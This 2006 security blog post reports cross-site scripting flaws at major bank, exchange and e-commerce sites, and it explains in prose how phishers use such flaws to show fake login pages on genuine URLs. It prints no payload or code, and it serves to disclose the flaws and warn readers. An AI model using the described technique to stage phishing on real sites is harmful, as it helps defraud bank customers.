Flaws in Financial Sites Aid Scammers
Most major U.S. financial institutions have made a noticeable effort over the past year to educate customers about the dangers of online "phishing" scams that use e-mail lures to trick people into giving away their personal data at fake bank Web sites. But according to research commissioned by Security Fix, many of these same institutions still don't do enough on their end to prevent scammers from exploiting programming flaws in their sites to steal customer credentials or otherwise swindle consumers.
Over the past two weeks, I worked with Lance James, chief technology officer for Secure Science Corp. and an expert on phishing attacks, to find and report a large number of such flaws in high-profile banking and e-commerce Web sites. The sites we looked at all were vulnerable to what are known as "cross-site scripting" (XSS) attacks, which occur when Web sites accept input from the user -- usually from something like a search box or e-mail form -- but do not properly filter that input to strip out or disallow potentially malicious code.
Phishers and online scammers exploit these types of flaws to make their scams appear more legitimate, because XSS vulnerabilities allow the attacker to force the target site to load content from somewhere else. A typical XSS attack usually goes like this: The bad guys send out e-mails designed to look like they were sent by the recipient's bank. The e-mails instruct recipients to click on a link and update their account information. Instead of directing them to a purely fraudulent site -- i.e., the hacker's own copy of a real login form -- the link puts the visitor on the bank's actual Web site, thereby giving it a legitimate URL. The page, however, has been manipulated to display content controlled by the attacker.
One XSS that James found recently at Visa.com uses a flaw in Visa's site-search function to load a sample login page from an external site. (That is just a gross example; James could just as easily have copied the HTML code from Visa's own login page, changed it so that the data went to him, and inserted the altered code from his site.)
Within a few minutes of searching, James found an identical flaw at the Web site of JPMorganChase.com. Notice that the name in the browser address bar shows that the visitor is indeed on Chase's site. Again, the content could have been anything: a login page, a request for the user's bank account number and mother's maiden name, or a script that that redirects the user to any other Web site.
Banks and e-commerce sites are not the only ones vulnerable to XSS exploitation. Even information-only sites -- those that hold no real financial or personal information about consumers-- can be leveraged to trick people. I have received quite an increase in penny-stock spam lately, the kind that fraudsters use in pump-and-dump scams to drive up the price of extremely cheap stocks through false and misleading statements.
Imagine how much more successful one of these spam runs could be if curious investors were shown such bogus statements displayed on the Web sites of the American Stock Exchange or the New York Stock Exchange? That's precisely what would be possible with the vulnerabilities James found on both Nyse.com and Amex.com.
In each screenshot, you can see that the link we followed loads the real site and then loads video content from a third-party site on top of it -- in this case from a rather humorous and apropos service at Justgotowned.com. Once again, these are merely examples.
A skilled attacker could completely redesign that entire page to show whatever he wanted. (The Amex.com screenshot does not include the address field because that exchange has not yet fixed the flaw. Amex spokeswoman Mary Chung said the company was in the process of doing so, and the folks at Nyse.com corrected their XSS problem Wednesday night.)
We found similar flaws at eBay, Nasdaq.com, BankofAmerica.com, American Express and Barclays, to name just a few others. One interesting XSS vulnerability was found at Microsoft.com, in a rather odd place: the page Microsoft uses to validate whether the copy of Windows you are using is registered and legitimate. Online criminals are constantly spoofing e-mailed security advisories from Microsoft in an attempt to trick people into installing malicious software. With XSS, attackers can put their download links right onto Microsoft's site.
I know what some of you may be thinking: "Wait a second, Brian. Smart consumers would know to look for an "https://" in front of a login page, or examine the site's security certificate to ensure that the site is in fact the bank they think it is and that it's using secure sockets layer (SSL) technology to safeguard the transmission of login data."
Maybe so (and they'd be smarter not to click on links that arrive in e-mail, period). But last week, Web site monitoring and security firm Netcraft posted a fascinating writeup on a scam e-mail that used an XSS flaw at Paypal to present visitors with a fraudulent login page on the company's legitimate SSL-protected site -- https://www.paypal.com.
Rich Miller, an analyst with Netcraft, said he is constantly surprised that these sorts of flaws exist because the banking industry always talks about how hard it is working to defeat phishing attacks. "Customer awareness is good," Millers said, "but the flip side of that is you have to work just as hard to secure your own Web site."
If there is a silver lining in all of this XSS madness, it's that for the most part, phishers have been content to try to scam online banking customers by directing them via e-mail to wholesale counterfeit sites, said Dan Hubbard, senior director of security and technology research for Websense, an anti-phishing and e-mail security company.
"We've seen a several attacks in the wild that utilize [cross-site scripting flaws] on banking sites, and it's definitely a big future threat," Hubbard said. "However, right now there is just so much low-hanging fruit for these guys that it's kind of not needed."
It's worth noting that as I tested some of these XSS flaws at various sites, Netcraft's anti-phishing toolbar -- which I have installed on the version of Firefox I have on one of my home PCs -- actually alerted me whenever I clicked on the links, noting that the technique is commonly used in phishing attacks.
Update, 12:24 p.m. ET: I've heard from a few people who were concerned that I was pointing out links to live exploits in the pictures in this blog post. Rest assured that in any of the pictures above, I have only included a view of the address bar in cases where the featured institution had already fixed the problem.
Posted by: antibozo | June 23, 2006 12:43 PM | Report abuse
Posted by: Fred | June 23, 2006 2:44 PM | Report abuse
Posted by: SandyK | June 23, 2006 4:09 PM | Report abuse
Posted by: Dave H | June 23, 2006 4:09 PM | Report abuse
Posted by: James A. Donald | June 26, 2006 5:36 AM | Report abuse
Posted by: James A. Donald | June 26, 2006 5:46 AM | Report abuse
Posted by: Mike | June 26, 2006 8:53 PM | Report abuse
Posted by: SandyK | June 27, 2006 12:10 AM | Report abuse
Posted by: edm | June 27, 2006 12:05 PM | Report abuse
The comments to this entry are closed.